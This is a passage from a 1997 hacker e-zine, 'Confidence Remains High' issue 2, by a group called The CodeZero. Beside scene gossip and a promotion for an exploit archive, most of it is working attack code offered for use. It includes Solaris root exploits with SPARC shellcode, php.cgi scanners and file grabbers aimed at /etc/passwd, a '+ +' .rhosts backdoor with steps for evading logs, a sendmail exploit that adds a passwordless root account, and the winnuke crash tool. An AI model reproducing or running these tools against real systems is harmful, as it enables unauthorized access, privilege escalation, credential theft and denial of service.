Copy Link
Add to Bookmark
Report
Confidence Remains High Issue 02
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue : 002. =--------------------=
=--------------------= Date : May 26th 1997. =--------------------=
=--------------------=====================================--------------------=
===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.:. Site Of The Month .:.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
=====================> http://www.codez.com NOW UP!@#* <=====================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
In This HUUUUUUuuuUUUUUGE Issue :
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
-----=> Section A : Introduction And Cover Story.
1. Confidence Remains High Issue 2....................: Tetsu Khan
2. wh0 the King?......................................: so1o
3. www.codez.com......................................: fr1day
-----=> Section B : Exploits And Code.
1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes
2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d
3. Scan For php Vunerable Servers ------=> phpscan.c.: so1o
4. Use php.cgi To Get Files ------------=> phpget.c..: p1
5. Hiding From Who (incase you didn't read the pilots): so1o
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1
7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith
8. Windoze NT / 95 Killer : winnuke.c.................: _eci
-----=> Section C : Phones / Scanning / Radio.
1. Federal Bugging Frequencies........................: Weapon-X
2. 911 Autodialler Script.............................: dk
3. Cellular Calls Without Cloning.....................: TRON
-----=> Section D : Miscellaneous.
1. Getting Your Exploits Onto Systems.................: so1o
2. Fakemailing Techniques.............................: so1o
3. Pascal Credit Card Generator Source................: Lobster Guacamole
4. in.courierd : backdoor on port 530.................: so1o
5. UK Laws On Computer Misuse.........................: Darkfool
6. so1o Gets Busted By CERT...........................: so1o
7. CERT Advisory CA-97.13 : xlock vunerablity.........: BugTraq
8. IRiX WWW Server Bugs...............................: Tetsu Khan
9. Hacking Not-So-Electrical Items....................: Tetsu Khan
-----=> Section E : World News.
1. Amnesty International Hacked.......................: Article from cnet.com
2. //sToRm// Of sIn Rips Port Pro.....................: so1o
3. Digital Darkness Lives.............................: so1o
4. /home/sdr 0wned....................................: so1o
5. Sendmail 8.8.4 Remote Is Out.......................: so1o
6. sIn inf0z Part 2...................................: The CodeZero
------=> Section F : Projects.
1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o
-----=> Section G : The End.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Confidence Remains High Issue 002 : Tetsu Khan
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
We have been very busy over the last 50 days, but we still managed to put
together the CodeZero Remote Attack Kit, which contains some very cutting
edge tools as well as some very optimised code, we have included all the
programs precompiled to run from a Linux 2.0.x box, this way you dont even
need a compiler to build this shit =) the source will be available when we
can be bothered to put it on our page, so enjoy this second *FREE* issue of...
...Confidence Remains High!
T_K
One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the
IRT are cool, and they think I live in Sweden :) Heres a disclaimer, just in
case anyone does get a bit annoyed :
***************************************************************************
** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY **
** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT **
** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS **
** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT. **
***************************************************************************
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. wh0 the King? : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, heres a rundown of the main groups and associations around the scene on
the efnet at this moment in time, as well as some comments and members...
r00t
====
Many say r00t own us, members include :
aleph1
Veggie
tfish
As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc,
Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC
security) as well as ALOT of others who are very well known in the underground.
r00t are definately the biggest group on the scene, and easily the most
powerful.
el8
===
el8 is another very powerful group, with members that between them make el8 a
force to be feared, members include :
prym
bw-
tsal
Overall, a good group, with some very smart people.
The CodeZero
============
We d0nt like to talk about ourselves, boosted up to 7 men now :)
The Secret Mouse Society (sms)
==============================
I dont really know much of this groups true power, but members include...
Calidor
vertex
vortex
They have many shells traders, and therefore probably alot of influence in the
shells world, as well as experience, quite a large group.
I wont even talk about Undernet groups, seeing they continually split, join
other groups, change names, rip other people code, shit like that, basically
acting like 12 year old warez kiddies (take sIn for example, or maybe even
Psychosis.)
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. www.codez.com : fr1day
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yah000!!!@# wE gOt A dOmAin!!!@~#
On www.codez.com we will have 40mb of space, this will include the following..
-=[ The Confidence Remains High Distro Point
-=[ The CodeZero Exploits / Programs And Tools Page
-=[ The Solaris 2.4 / 2.5.x Exploit Collection
-=[ The Solaris Tools Collection
-=[ The Solaris CodeZero Tools Collection
-=[ The Linux 2.0.x Exploit Collection
-=[ The Linux Tools Collection
-=[ The Linux CodeZero Tools Collection
-=[ W1nd0ze And d0S Tools Collection
-=[ Assorted Text Philes Collection
-=[ The CodeZero FTP Site
-=[ H/P/A/V/C E-Zine Archive
-=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive
So don't delay! GO THERE TODAY!@# And if you can, please link your sites to
www.codez.com, as we would be very grateful :) Seeing we are basically giving
all this shit to you for PHREE!
phr1day
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/*
If a tty port that is writeable by the user and owned by root is
opened and the I_PUSH "ms" ioctl call made followed by an lseek
the effective uid of the user is changed to root.
*/
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <stropts.h>
#include <sys/stat.h>
#include <sys/conf.h>
main(argc, argv)
int argc;
char* argv[];
{
int fd;
if (argc < 2)
{
fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
exit(1);
}
fd = open("/dev/ttyb", O_RDWR);
printf("Your current effective uid is %d\n", geteuid());
ioctl(fd, I_PUSH, "ms");
lseek(fd, 0, 1);
printf("Your effective uid has been changed to %d\n", geteuid());
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 400
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA + 8];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf ;
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i < code_length; i++)
*char_p++ = sparc_shellcode[i];
long_p = (u_long *) char_p;
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ =targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
execl("/bin/eject", "eject", & buf[1],(char *) 0);
perror("execl failed");
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
3. Scan For php Vunerable Servers : phpscan.c : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The next two programs, phpscan.c and phpget.c are fully compiled in the
CodeZero Remote Attack Kit, details about the whole kit in section F, part 2.
These two programs use a hole in the php.cgi code that allows remote users to
read any file on the system that the http daemon has access to.
Vunerable servers I have found include www.2600.com (FreeBSD 2.1), so it does
have some effect, use phpscan.c to scan from a list of hosts, then phpget.c to
retrieve files from the remote hosts.
Here begins the c0de...
/*
phpscan.c : php.cgi vunerable server scanning program.
Basically a modified phf scanner, by Alhambra of The Guild.
Modifications to php.cgi by so1o of The CodeZero.
Usage:
phpscan <infile> <outfile>
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}
main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;
char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
nametocheck = gethostbyname (hosta);
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0],sizeof (outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;
alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);
if(FLAG == 1 && X==0){
write(outsocket,PHPMessage,strlen(PHPMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket);
}
return 0;
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
4. Use php To Get Files : phpget.c : p1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Heres the phpget.c, use it wisely...Some useful files to pull include...
/etc/passwd
/etc/hosts
/etc/services
/etc/syslogd.conf
/etc/inetd.conf
/*
p1 (peewun@heterosexual.com)
This code retrieves a file using php.cgi on a remote system.
This program is for educational purposes only. Use it on p1.com.
*/
#include <signal.h>
#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <string.h>
FILE *server;
int sock;
void do_connect(char *host, char *toget);
void do_connect(char *host, char *toget)
{
char inbuf[1024];
struct sockaddr_in sin;
struct hostent *hp;
char *tmpbuf;
hp = gethostbyname(host);
bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
sin.sin_family = hp->h_addrtype;
sin.sin_port = htons(80);
sock = socket(AF_INET, SOCK_STREAM, 0);
if ( -1 < connect(sock, (struct sockaddr *) &sin, sizeof(sin)) ) {
printf("Made connection to %s.\n\n", host);
} else {
printf("Failed to connect to %s.\n\n",host);
exit(0);
}
server=fdopen(sock, "a+");
fprintf(server, "GET /cgi-bin/php.cgi?%s\n",toget);
printf("Output from php.cgi request:\n\n");
while(1){
if (fgets(inbuf, 1024, server) == NULL)
break;
printf(inbuf);
}
}
main(int argc,char **argv)
{
printf("\nThis program retrieves files off a remote system using php.cgi.\n");
printf("Author: p1 - peewun@heterosexual.com\n");
if (argc < 3) {
printf("Usage: %s <domain> <path and file>\n",argv[0]);
printf(" Ex: %s www.p1.com /etc/passwd\n",argv[0]);
}
else {
char *buffer;
(char *)"exit";
do_connect(argv[1],argv[2]);
exit(1);
}
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
5. Hiding From Who : so1o
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Okay, bog standard easy shit, works on nearly all systems depending on security
arrangements, I advise you always try this method first when trying to hide.
DONT type the % signs !!!@~"!* ThEy ArE PrOmPtZ!!!
Telnet into the system, then type...
% cd
% echo "+ +" >> .rhosts
If this gives an error, like "Cannot create .rhosts" then try...
% cd
% echo "+ +" > .rhosts
Next telnet to the machines EXACT address, not 127.0.0.1 or localhost,
this way works the most effectively..as it says "last login from..." and you
don't want your ip to be mentioned, or for anyone to get suspicious, so you
will need to cover your tracks.
% telnet machine.host.com
(then log in again, using the same L/P)
now exit completely, using exit twice.
The system is now all set up for you to log in without being seen or logged,
as the + + you echo to the .rhosts file in the users home directory is actually
used so that you can remotely execute commands on the system using rsh, or
login into the system remotely, using rlogin, neither operations require a
password, just a login name, so if the user changes his password, you will
still be able to use this technique, now we can attempt to log into the
system untraced, for this we need to either run linux, or be in a shell,
follow this one, easy step, replace "login" with your login, and host.com
with the EXACT host you want to get into...
% rsh -l login host.com csh -i
eg...
% rsh -l tetsu microsoft.com csh -i
This then runs csh (c shell) on the remote host (microsoft) in
interactive mode..you should see something like this...
% rsh -l tetsu microsoft.com csh -i
...Thus no control on this tty, blah blah blah
%
Now you are in, type who :
% who
%
w00 w00!! no-one seems to be logged in, and you are therefore hidden!! Now
you can proceed to hack the host without having to worry whos watching you.
Note : Systems Administrators often look over their users directories for
.rhosts files, so be aware of that.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit : p1
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If modeX would have given us his 884 REMOTE exploit with all the offsets, then
we would have published it, but he didn't, so we ain't :( Have the local version
instead...
#!/bin/bash
clear
echo
echo Sendmail 8.8.4 and 8.8.5 local exploit.
echo Scripting by p1 \(peewun@heterosexual.com\) on 4-15-97.
echo
if [ $1 = "-rm" ]
then
echo Removing /var/tmp/dead.letter
echo
rm -rf /var/tmp/dead.letter
echo Attempting to continue with exploit.
echo
fi
if [ -e /var/tmp/dead.letter ]
then
echo File exists: /var/tmp/dead.letter
echo
echo If you wish to run this exploit, please delete it by running this
echo exploit with the -rm flag.
echo
exit
fi
ln -s /etc/passwd /var/tmp/dead.letter
cat >> unf << _EOF_
helo
mail from: very@bad.address.here
rcpt to: another@bad.bad.address
data
owned::0:0:exploitation:/:/bin/sh
.
_EOF_
cat unf | telnet localhost 25 >> /dev/null
rm -rf unf
echo
echo Please wait for dead.letter to possibly be appended to by sendmail.
echo
sleep 10
if grep exploitation /etc/passwd
then
echo Successful addition of account 'owned' to /etc/passwd, running 'su.'
su owned
else
echo Unsuccessful exploitation of symbolic link bug.
fi
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
7. Ident Scanner : ident-scan.c : Dave Goldsmith
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Very very useful and quick tool, especially if it finds daemons running as root
that shouldn't be...Or even backdoors on high ports.
Usage : ident-scan <host> [low port] [high port]
/*
* ident-scan [v0.15]
* This TCP scanner has the additional functionality of retrieving
* the username that owns the daemon running on the specified port.
* It does this by by attempting to connect to a TCP port, and if it
* succeeds, it will send out an ident request to identd on the
* remote host. I believe this to be a flaw in the design of the
* protocol, and if it is the developers intent to allow 'reverse'
* idents, then it should have been stated clearer in the
* rfc(rfc1413).
*
* USES:
* It can be useful to determine who is running daemons on high ports
* that can be security risks. It can also be used to search for
* misconfigurations such as httpd running as root, other daemons
* running under the wrong uids.
*
* COMPILES: Compiles fine under Linux, BSDI and SunOS 4.1.x.
*
* Dave Goldsmith
* <daveg@escape.com>
*/
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
enum errlist
{
BAD_ARGS,BAD_HOST,NO_IDENT,SOCK_ERR
};
void
usage(error)
enum errlist error;
{
fprintf(stderr,"ident-scan: ");
switch(error)
{
case BAD_ARGS: fprintf(stderr,"usage: ident-scan hostname [low port] [hi port]\n");
break;
case BAD_HOST: fprintf(stderr,"error: cant resolve hostname\n");
break;
case NO_IDENT: fprintf(stderr,"error: ident isnt running on host\n");
break;
case SOCK_ERR: fprintf(stderr,"error: socket() failed\n");
break;
}
exit(-1);
}
struct hostent *
fill_host(machine,host)
char *machine;
struct hostent *host;
{
if ((host=gethostbyname(machine))==NULL)
{
if ((host=gethostbyaddr(machine,4,AF_INET))==NULL)
return(host);
}
return(host);
}
int
main(argc,argv)
int argc;
char **argv;
{
struct sockaddr_in forconnect,forport,forident;
int i,sockfd,identfd,len=sizeof(forport),hiport=9999,loport=1,curport;
struct servent *service;
struct hostent *host;
char identbuf[15], recieved[85], *uid;
if ((argc<2) || (argc>4))
usage(BAD_ARGS);
if (argc>2)
loport=atoi(argv[2]);
if (argc>3)
hiport=atoi(argv[3]);
if ((host=fill_host(argv[1],host))==NULL)
usage(BAD_HOST);
forconnect.sin_family=host->h_addrtype;
forconnect.sin_addr.s_addr=*((long *)host->h_addr);
forident.sin_family=host->h_addrtype;
forident.sin_addr.s_addr=*((long *)host->h_addr);
forident.sin_port=htons(113);
if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
usage(SOCK_ERR);
if ((connect(identfd,(struct sockaddr *)&forident,sizeof(forident)))!=0)
usage(NO_IDENT);
close(identfd);
for(curport=loport;curport<=hiport;curport++)
{
for(i=0;i!=85;i++)
recieved[i]='\0';
forconnect.sin_port=htons(curport);
if ((sockfd=socket(AF_INET,SOCK_STREAM,0))== -1)
usage(SOCK_ERR);
if (connect(sockfd,(struct sockaddr *)&forconnect,sizeof(forconnect))==0)
{
if (getsockname(sockfd,(struct sockaddr *)&forport,&len)==0)
{
if ((identfd=socket(AF_INET,SOCK_STREAM,0))== -1)
usage(SOCK_ERR);
if (connect(identfd,(struct sockaddr *)&forident,sizeof(forident))==0)
{
sprintf(identbuf,"%u,%u",htons(forconnect.sin_port),
htons(forport.sin_port));
write(identfd,identbuf,strlen(identbuf)+1);
read(identfd,recieved,80);
recieved[strlen(recieved)-1]='\0';
uid=strrchr(recieved,' ');
service=getservbyport(forconnect.sin_port,"tcp");
printf("Port: %3d\tService: %10s\tUserid: %s\n",curport,
(service==NULL)?"(?)":service->s_name,uid);
}
}
}
close(sockfd);
close(identfd);
}
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
8. Windoze NT / 95 Killer : winnuke.c : _eci
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
/* winnuke.c - (05/07/97) By _eci */
/* Tested on Linux 2.0.30, SunOS 5.5.1, and BSDI 2.1 */
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#define dport 139 /* Attack port: 139 is what we want */
int x, s;
char *str = "Bye"; /* Makes no diff */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;
int open_sock(int sock, char *server, int port) {
struct sockaddr_in blah;
struct hostent *he;
bzero((char *)&blah,sizeof(blah));
blah.sin_family=AF_INET;
blah.sin_addr.s_addr=inet_addr(server);
blah.sin_port=htons(port);
if ((he = gethostbyname(server)) != NULL) {
bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
}
else {
if ((blah.sin_addr.s_addr = inet_addr(server)) < 0) {
perror("gethostbyname()");
return(-3);
}
}
if (connect(sock,(struct sockaddr *)&blah,16)==-1) {
perror("connect()");
close(sock);
return(-4);
}
printf("Connected to [%s:%d].\n",server,port);
return;
}
void main(int argc, char *argv[]) {
if (argc != 2) {
printf("Usage: %s <target>\n",argv[0]);
exit(0);
}
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
perror("socket()");
exit(-1);
}
open_sock(s,argv[1],dport);
printf("Sending crash... ");
send(s,str,strlen(str),MSG_OOB);
usleep(100000);
printf("Done!\n");
close(s);
}
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
===============================================================================
==[ FONES / SCANNING ]=========[ .SECTION C. ]===========[ FONES / SCANNING ]==
===============================================================================
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
1. Federal Bugging Frequencies : Weapon-X
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
